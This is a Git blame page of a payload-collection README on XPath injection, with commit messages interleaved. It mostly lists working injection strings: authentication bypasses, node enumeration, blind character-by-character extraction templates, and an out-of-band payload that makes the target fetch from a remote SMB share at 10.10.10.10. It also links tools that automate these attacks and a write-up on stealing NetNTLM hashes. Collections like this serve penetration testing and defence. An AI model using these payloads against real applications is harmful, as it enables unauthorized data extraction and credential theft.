Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-14 00:47:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/XPATH Injection/README.md

66 lines
2 KiB
Markdown
Raw Normal View History

Normalize Titles
2022-10-12 10:13:55 +00:00
# XPATH Injection
Markdown formatting update
2018-08-12 21:30:22 +00:00
Out of band XPATH
2019-10-22 21:06:35 +00:00
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
## Summary
* [Exploitation](#exploitation)
* [Blind exploitation](#blind-exploitation)
* [Out Of Band Exploitation](#out-of-band-exploitation)
XPATH: add tools
2019-10-26 14:43:36 +00:00
* [Tools](#tools)
Out of band XPATH
2019-10-22 21:06:35 +00:00
* [References](#references)
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
## Exploitation
Markdown formatting update
2018-08-12 21:30:22 +00:00
Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=" +vuln_var1+ "']/account/text())"`
```sql
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
Bind shell cheatsheet (Fix #194)
2020-05-24 12:09:46 +00:00
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
```
## Blind Exploitation
Markdown formatting update
2018-08-12 21:30:22 +00:00
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
1. Size of a string
Out of band XPATH
2019-10-22 21:06:35 +00:00
```sql
and string-length(account)=SIZE_INT
```
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
2. Extract a character
Out of band XPATH
2019-10-22 21:06:35 +00:00
```sql
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
```
## Out Of Band Exploitation
```powershell
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
```
XPATH: add tools
2019-10-26 14:43:36 +00:00
## Tools
- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
Adding references sectio
2018-12-24 14:02:50 +00:00
## References
Markdown formatting update
2018-08-12 21:30:22 +00:00
LDAP & XPATH injection + Small fixes and payloads
2017-07-14 21:40:31 +00:00
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
Out of band XPATH
2019-10-22 21:06:35 +00:00
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
Reference in a new issue Copy permalink